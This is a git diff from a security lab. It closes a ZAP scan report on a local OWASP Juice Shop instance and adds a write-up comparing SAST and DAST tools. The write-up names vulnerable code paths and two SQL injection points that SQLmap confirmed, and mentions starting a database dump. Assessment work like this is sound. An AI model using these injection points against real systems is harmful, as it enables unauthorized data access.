", + "instances":[ + { + "id": "58", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "138", + "uri": "http://localhost:3000/ftp", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "134", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "143", + "uri": "http://localhost:3000/juice-shop/build/routes/main.js", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "141", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "142", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "144", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "125", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "132", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css", 
+ "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "146", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "133", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/styles.css", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "56", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Embedder-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "60", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "139", + "uri": "http://localhost:3000/ftp", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "148", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "151", + "uri": "http://localhost:3000/juice-shop/build/routes/main.js", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "153", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "145", 
+ "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "152", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "126", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "147", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "150", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "149", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/styles.css", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "59", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "Cross-Origin-Opener-Policy", + "attack": "", + "evidence": "", + "otherinfo": "" + } + ], + "count": "24", + "systemic": false, + "solution": "Ensure that the application/web server sets the Cross-Origin-Embedder-Policy header appropriately, and that it sets the Cross-Origin-Embedder-Policy header to 'require-corp' for documents.
If possible, ensure that the end user uses a standards-compliant and modern web browser that supports the Cross-Origin-Embedder-Policy header (https://caniuse.com/mdn-http_headers_cross-origin-embedder-policy).
", + "otherinfo": "", + "reference": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Cross-Origin-Embedder-Policy
", + "cweid": "693", + "wascid": "14", + "sourceid": "7" + }, + { + "pluginid": "10096", + "alertRef": "10096", + "alert": "Timestamp Disclosure - Unix", + "name": "Timestamp Disclosure - Unix", + "riskcode": "1", + "confidence": "1", + "riskdesc": "Low (Low)", + "desc": "A timestamp was disclosed by the application/web server. - Unix
", + "instances":[ + { + "id": "20", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1650485437", + "otherinfo": "1650485437, which evaluates to: 2022-04-20 20:10:37." + }, + { + "id": "22", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1981395349", + "otherinfo": "1981395349, which evaluates to: 2032-10-14 19:35:49." + }, + { + "id": "21", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "2038834951", + "otherinfo": "2038834951, which evaluates to: 2034-08-10 15:02:31." + }, + { + "id": "26", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1650485437", + "otherinfo": "1650485437, which evaluates to: 2022-04-20 20:10:37." + }, + { + "id": "30", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1981395349", + "otherinfo": "1981395349, which evaluates to: 2032-10-14 19:35:49." + }, + { + "id": "28", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "2038834951", + "otherinfo": "2038834951, which evaluates to: 2034-08-10 15:02:31." + }, + { + "id": "43", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1650485437", + "otherinfo": "1650485437, which evaluates to: 2022-04-20 20:10:37." + }, + { + "id": "34", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1680327869", + "otherinfo": "1680327869, which evaluates to: 2023-04-01 05:44:29." 
+ }, + { + "id": "31", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1701244813", + "otherinfo": "1701244813, which evaluates to: 2023-11-29 08:00:13." + }, + { + "id": "41", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1818181818", + "otherinfo": "1818181818, which evaluates to: 2027-08-13 18:30:18." + }, + { + "id": "33", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1839622642", + "otherinfo": "1839622642, which evaluates to: 2028-04-17 22:17:22." + }, + { + "id": "35", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1863874346", + "otherinfo": "1863874346, which evaluates to: 2029-01-23 14:52:26." + }, + { + "id": "39", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1917098446", + "otherinfo": "1917098446, which evaluates to: 2030-10-01 15:20:46." + }, + { + "id": "45", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "1981395349", + "otherinfo": "1981395349, which evaluates to: 2032-10-14 19:35:49." + }, + { + "id": "32", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "2033195021", + "otherinfo": "2033195021, which evaluates to: 2034-06-06 08:23:41." + }, + { + "id": "44", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "2038834951", + "otherinfo": "2038834951, which evaluates to: 2034-08-10 15:02:31." 
+ } + ], + "count": "16", + "systemic": false, + "solution": "Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.
", + "otherinfo": "1650485437, which evaluates to: 2022-04-20 20:10:37.
", + "reference": "https://cwe.mitre.org/data/definitions/200.html
", + "cweid": "497", + "wascid": "13", + "sourceid": "1" + }, + { + "pluginid": "10116", + "alertRef": "10116", + "alert": "ZAP is Out of Date", + "name": "ZAP is Out of Date", + "riskcode": "1", + "confidence": "3", + "riskdesc": "Low (High)", + "desc": "The version of ZAP you are using to test your app is out of date and is no longer being updated.
The risk level is set based on how out of date your ZAP version is.
", + "instances":[ + { + "id": "49", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "The latest version of ZAP is 2.17.0" + } + ], + "count": "1", + "systemic": false, + "solution": "Download the latest version of ZAP from https://www.zaproxy.org/download/ and install it.
", + "otherinfo": "The latest version of ZAP is 2.17.0
", + "reference": "https://www.zaproxy.org/download/
", + "cweid": "1104", + "wascid": "45", + "sourceid": "1" + }, + { + "pluginid": "10027", + "alertRef": "10027", + "alert": "Information Disclosure - Suspicious Comments", + "name": "Information Disclosure - Suspicious Comments", + "riskcode": "0", + "confidence": "1", + "riskdesc": "Informational (Low)", + "desc": "The response appears to contain suspicious comments which may help an attacker.
", + "instances":[ + { + "id": "38", + "uri": "http://localhost:3000/main.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "query", + "otherinfo": "The following pattern was used: \\bQUERY\\b and was detected in likely comment: \"//owasp.org' target='_blank'>Open Worldwide Application Security Project (OWASP) and is developed and maintained by voluntee\", see evidence field for the suspicious comment/snippet." + }, + { + "id": "48", + "uri": "http://localhost:3000/vendor.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Query", + "otherinfo": "The following pattern was used: \\bQUERY\\b and was detected in likely comment: \"//www.w3.org/2000/svg\" viewBox=\"0 0 512 512\">The following pattern was used: \\bQUERY\\b and was detected in likely comment: \"//owasp.org' target='_blank'>Open Worldwide Application Security Project (OWASP) and is developed and maintained by voluntee\", see evidence field for the suspicious comment/snippet.
", + "reference": "", + "cweid": "615", + "wascid": "13", + "sourceid": "22" + }, + { + "pluginid": "10109", + "alertRef": "10109", + "alert": "Modern Web Application", + "name": "Modern Web Application", + "riskcode": "0", + "confidence": "2", + "riskdesc": "Informational (Medium)", + "desc": "The application appears to be a modern web application. If you need to explore it automatically then the Ajax Spider may well be more effective than the standard one.
", + "instances":[ + { + "id": "19", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "123", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "136", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:59:18", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "137", + "uri": "http://localhost:3000/juice-shop/build/routes/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "130", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "129", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." 
+ }, + { + "id": "128", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "131", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "127", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/main.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "135", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/polyfills.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "121", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "122", + "uri": "http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." 
+ }, + { + "id": "124", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + }, + { + "id": "24", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + } + ], + "count": "14", + "systemic": false, + "solution": "This is an informational alert and so no changes are required.
", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application.
", + "reference": "", + "cweid": "-1", + "wascid": "-1", + "sourceid": "1" + }, + { + "pluginid": "10049", + "alertRef": "10049-1", + "alert": "Non-Storable Content", + "name": "Non-Storable Content", + "riskcode": "0", + "confidence": "2", + "riskdesc": "Informational (Medium)", + "desc": "The response contents are not storable by caching components such as proxy servers. If the response does not contain sensitive, personal or user-specific information, it may benefit from being stored and cached, to improve performance.
", + "instances":[ + { + "id": "85", + "uri": "http://localhost:3000/ftp/eastere.gg", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "403", + "otherinfo": "" + }, + { + "id": "91", + "uri": "http://localhost:3000/ftp/encrypt.pyc", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "403", + "otherinfo": "" + }, + { + "id": "101", + "uri": "http://localhost:3000/ftp/package.json.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "403", + "otherinfo": "" + } + ], + "count": "3", + "systemic": false, + "solution": "The content may be marked as storable by ensuring that the following conditions are satisfied:
The request method must be understood by the cache and defined as being cacheable (\"GET\", \"HEAD\", and \"POST\" are currently defined as cacheable)
The response status code must be understood by the cache (one of the 1XX, 2XX, 3XX, 4XX, or 5XX response classes are generally understood)
The \"no-store\" cache directive must not appear in the request or response header fields
For caching by \"shared\" caches such as \"proxy\" caches, the \"private\" response directive must not appear in the response
For caching by \"shared\" caches such as \"proxy\" caches, the \"Authorization\" header field must not appear in the request, unless the response explicitly allows it (using one of the \"must-revalidate\", \"public\", or \"s-maxage\" Cache-Control response directives)
In addition to the conditions above, at least one of the following conditions must also be satisfied by the response:
It must contain an \"Expires\" header field
It must contain a \"max-age\" response directive
For \"shared\" caches such as \"proxy\" caches, it must contain a \"s-maxage\" response directive
It must contain a \"Cache Control Extension\" that allows it to be cached
It must have a status code that is defined as cacheable by default (200, 203, 204, 206, 300, 301, 404, 405, 410, 414, 501).
", + "otherinfo": "", + "reference": "https://datatracker.ietf.org/doc/html/rfc7234
https://datatracker.ietf.org/doc/html/rfc7231
https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html
", + "cweid": "524", + "wascid": "13", + "sourceid": "40" + }, + { + "pluginid": "10049", + "alertRef": "10049-3", + "alert": "Storable and Cacheable Content", + "name": "Storable and Cacheable Content", + "riskcode": "0", + "confidence": "2", + "riskdesc": "Informational (Medium)", + "desc": "The response contents are storable by caching components such as proxy servers, and may be retrieved directly from the cache, rather than from the origin server by the caching servers, in response to similar requests from other users. If the response data is sensitive, personal or user-specific, this may result in sensitive information being leaked. In some cases, this may even result in a user gaining complete control of the session of another user, depending on the configuration of the caching components in use in their environment. This is primarily an issue where \"shared\" caching servers such as \"proxy\" caches are configured on the local network. This configuration is typically found in corporate or educational environments, for instance.
", + "instances":[ + { + "id": "66", + "uri": "http://localhost:3000/robots.txt", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "In the absence of an explicitly specified caching lifetime directive in the response, a liberal lifetime heuristic of 1 year was assumed. This is permitted by rfc7234." + } + ], + "count": "1", + "systemic": false, + "solution": "Validate that the response does not contain sensitive, personal or user-specific information. If it does, consider the use of the following HTTP response headers, to limit, or prevent the content being stored and retrieved from the cache by another user:
Cache-Control: no-cache, no-store, must-revalidate, private
Pragma: no-cache
Expires: 0
This configuration directs both HTTP 1.0 and HTTP 1.1 compliant caching servers to not store the response, and to not retrieve the response (without validation) from the cache, in response to a similar request.
", + "otherinfo": "In the absence of an explicitly specified caching lifetime directive in the response, a liberal lifetime heuristic of 1 year was assumed. This is permitted by rfc7234.
", + "reference": "https://datatracker.ietf.org/doc/html/rfc7234
https://datatracker.ietf.org/doc/html/rfc7231
https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html
", + "cweid": "524", + "wascid": "13", + "sourceid": "6" + }, + { + "pluginid": "10049", + "alertRef": "10049-2", + "alert": "Storable but Non-Cacheable Content", + "name": "Storable but Non-Cacheable Content", + "riskcode": "0", + "confidence": "2", + "riskdesc": "Informational (Medium)", + "desc": "The response contents are storable by caching components such as proxy servers, but will not be retrieved directly from the cache, without validating the request upstream, in response to similar requests from other users.
", + "instances":[ + { + "id": "50", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "63", + "uri": "http://localhost:3000/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "88", + "uri": "http://localhost:3000/ftp/acquisitions.md", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "76", + "uri": "http://localhost:3000/ftp/incident-support.kdbx", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "97", + "uri": "http://localhost:3000/ftp/legal.md", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "69", + "uri": "http://localhost:3000/main.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "67", + "uri": "http://localhost:3000/polyfills.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "64", + "uri": "http://localhost:3000/runtime.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "51", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "62", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "72", + "uri": "http://localhost:3000/vendor.js", + "nodeName": null, + "method": "GET", + "param": "", + 
"attack": "", + "evidence": "max-age=0", + "otherinfo": "" + } + ], + "count": "11", + "systemic": false, + "solution": "", + "otherinfo": "", + "reference": "https://datatracker.ietf.org/doc/html/rfc7234
https://datatracker.ietf.org/doc/html/rfc7231
https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html
", + "cweid": "524", + "wascid": "13", + "sourceid": "7" + } + ] + } + ], + "sequences":[ + ] + +} diff --git a/labs/submission5.md b/labs/submission5.md new file mode 100644 index 00000000..af47e91b --- /dev/null +++ b/labs/submission5.md 
@@ -0,0 +1,130 @@ +# Lab 5 Submission - SAST and Multi-Tool DAST Analysis + +## Task 1 - SAST with Semgrep + +### Scope and Evidence + +Target source: OWASP Juice Shop `v19.0.0` cloned under `labs/lab5/semgrep/juice-shop`. + +Evidence files: + +- `labs/lab5/semgrep/semgrep-results.json` +- `labs/lab5/analysis/sast-analysis.txt` + +Semgrep reported **8 code-level findings**. The custom/security rules detected high-signal issues in server-side TypeScript routes, especially unsafe dynamic evaluation, raw SQL string construction, weak hashing, and user-controlled redirects. + +### SAST Tool Effectiveness + +Semgrep was effective for vulnerabilities that can be recognized directly in source code before deployment. In this run it found: + +- SQL injection pattern in `routes/search.ts` +- unsafe `eval()` usage in `routes/captcha.ts` and `routes/userProfile.ts` +- insecure MD5 hashing in `lib/insecurity.ts` +- multiple open redirect paths in route handlers + +The result set is smaller than a full dependency scanner because this SAST run focused on code patterns, not package CVEs. Its main value is early developer feedback: it identifies dangerous implementation constructs before the application is running. 
+ +### Five Most Critical Semgrep Findings + +| # | Vulnerability type | File and line | Severity | Evidence | +|---:|---|---|---|---| +| 1 | SQL injection via raw SQL string interpolation | `/src/routes/search.ts:23` | ERROR | `output.juice-shop-sql-string-interpolation` | +| 2 | Dynamic code execution with `eval()` | `/src/routes/captcha.ts:23` | ERROR | `output.juice-shop-eval` | +| 3 | Dynamic code execution with `eval()` | `/src/routes/userProfile.ts:62` | ERROR | `output.juice-shop-eval` | +| 4 | Weak cryptographic hash | `/src/lib/insecurity.ts:43` | WARNING | `output.juice-shop-md5-hash` | +| 5 | User-controlled redirect | `/src/routes/redirect.ts:19` | WARNING | `output.juice-shop-open-redirect` | + +## Task 2 - DAST with ZAP, Nuclei, Nikto, and SQLmap + +### Scope and Evidence + +Target runtime: `bkimminich/juice-shop:v19.0.0` on `http://localhost:3000`. + +Evidence files: + +- `labs/lab5/zap/zap-report-noauth.json` +- `labs/lab5/zap/report-noauth.html` +- `labs/lab5/zap/zap-report-auth.json` +- `labs/lab5/zap/report-auth.html` +- `labs/lab5/zap/auth-check.txt` +- `labs/lab5/zap/admin-application-configuration.json` +- `labs/lab5/nuclei/nuclei-results.json` +- `labs/lab5/nikto/nikto-results.txt` +- `labs/lab5/sqlmap/search-scan.log` +- `labs/lab5/sqlmap/login-scan.log` +- `labs/lab5/sqlmap/results-05082026_1141am.csv` + +### Authenticated vs Unauthenticated ZAP Scanning + +| Scan | URLs reported by ZAP | Alert rules | Alert instances | Severity breakdown | +|---|---:|---:|---:|---| +| Unauthenticated baseline | 95 | 13 | 133 | 2 Medium, 6 Low, 5 Informational | +| Authenticated baseline with JWT header | 95 | 11 | 94 | 2 Medium, 5 Low, 4 Informational | + +The authenticated scan used a Juice Shop admin JWT as an `Authorization: Bearer ...` header. Authentication was verified separately by successfully requesting `/rest/admin/application-configuration`, saved in `labs/lab5/zap/admin-application-configuration.json`. 
+ +In this run the ZAP baseline spider still discovered the same top-level URL count because it did not execute a full logged-in browser workflow. Even so, the authenticated setup matters: APIs that require a session token, such as `/rest/admin/application-configuration`, cannot be assessed correctly with a purely anonymous scanner. For production-grade testing, the stronger approach would be ZAP Automation Framework with browser-based login, AJAX spider, and authenticated active scan. + +### Tool Comparison Matrix + +| Tool | Findings | Severity breakdown | Best use case | +|---|---:|---|---| +| ZAP unauthenticated | 13 alert rules / 133 instances | 2 Medium, 6 Low, 5 Informational | Broad web app baseline, passive checks, headers, content issues | +| ZAP authenticated | 11 alert rules / 94 instances | 2 Medium, 5 Low, 4 Informational | Testing authenticated/API surfaces when a valid session is available | +| Nuclei | 1 template match | 1 Info | Fast known-template discovery and exposed endpoint detection | +| Nikto | 84 reported items | Nikto text findings, mostly headers/exposed files | Web server misconfiguration and interesting file/path checks | +| SQLmap | 2 injectable endpoints | Search and login confirmed SQL injection against SQLite | Deep SQL injection confirmation and exploitation evidence | + +### Tool-Specific Strengths and Example Findings + +**ZAP** is best for broad web application coverage and HTTP response analysis. It found missing Content Security Policy, cross-domain misconfiguration, dangerous JavaScript functions, suspicious comments, and timestamp disclosure. + +**Nuclei** is fast and template-driven. It detected a public Swagger/OpenAPI surface at `/api-docs/swagger.yaml`, which is useful for API discovery and attack surface mapping. + +**Nikto** is useful for web server and path-oriented checks. It reported missing `strict-transport-security`, `referrer-policy`, `permissions-policy`, and `content-security-policy` headers. 
It also flagged interesting paths such as `/ftp/`, `/public/`, and `/.htpasswd`. + +**SQLmap** is the strongest tool here for SQL injection confirmation. It confirmed: + +- `GET /rest/products/search?q=*` as boolean-based blind SQL injection against SQLite +- `POST /rest/user/login` JSON `email` parameter as boolean-based blind SQL injection against SQLite + +The login scan also started dumping database content. I stopped it after evidence was collected because the full dump exceeded the practical runtime for this lab execution. + +## Task 3 - SAST/DAST Correlation and Security Assessment + +### Findings Summary + +| Category | Result count | +|---|---:| +| SAST: Semgrep code findings | 8 | +| DAST: ZAP unauthenticated alert rules | 13 | +| DAST: ZAP authenticated alert rules | 11 | +| DAST: Nuclei matches | 1 | +| DAST: Nikto items | 84 | +| DAST: SQLmap confirmed injection points | 2 | + +### Correlation + +The clearest correlation is SQL injection. Semgrep found the unsafe SQL construction in `routes/search.ts`, and SQLmap confirmed that the running application is exploitable through `/rest/products/search?q=*`. This is a strong example of SAST and DAST reinforcing the same risk from different angles: source-level root cause plus runtime exploitability. + +SAST-only findings in this run: + +- unsafe `eval()` in source code +- weak MD5 hashing implementation +- open redirect code paths in route handlers + +DAST-only findings in this run: + +- missing or weak HTTP security headers +- public Swagger/OpenAPI exposure +- interesting runtime paths and files such as `/ftp/`, `/public/`, and `/.htpasswd` + +### Recommendations + +1. Use Semgrep in pull requests to catch dangerous code constructs early, especially raw SQL, dynamic evaluation, weak crypto, and redirect logic. +2. Use ZAP against deployed environments to catch HTTP headers, browser-visible issues, and authenticated attack surface. +3. 
Use Nuclei as a quick template-based exposure check in CI or scheduled scans. +4. Use Nikto for server/path misconfiguration checks during deployment validation. +5. Use SQLmap only in controlled environments for targeted confirmation when SAST or DAST suggests SQL injection risk. +6. Fix the confirmed SQL injection by replacing string-built SQL with parameterized queries. +7. Add strict HTTP security headers, especially CSP, HSTS, Referrer-Policy, and Permissions-Policy.
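Review bot: the committed ZAP report (the `zap-report-noauth.json` hunk above) carries a "ZAP is Out of Date" alert (pluginid 10116, otherinfo "The latest version of ZAP is 2.17.0"), so the scan was produced by a stale scanner and that alert is a tool-health item, not an application finding; pin the ZAP image to the current release and re-run before treating the alert-rule and instance counts as the baseline, since a stale passive-scan rule set can also miss checks. A second thing to verify: many instance URIs in the COEP/COOP and "Modern Web Application" lists have the form `/juice-shop/node_modules/express/lib/router/index.js:328:13` and `/juice-shop/build/routes/fileServer.js:43:13`, i.e. file:line:column strings that look like a stack trace the spider picked up from a response and then requested as paths. If an error response on the target exposes a stack trace, that is an information-disclosure finding in its own right and should be recorded in the analysis rather than left as noise in the instance lists.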
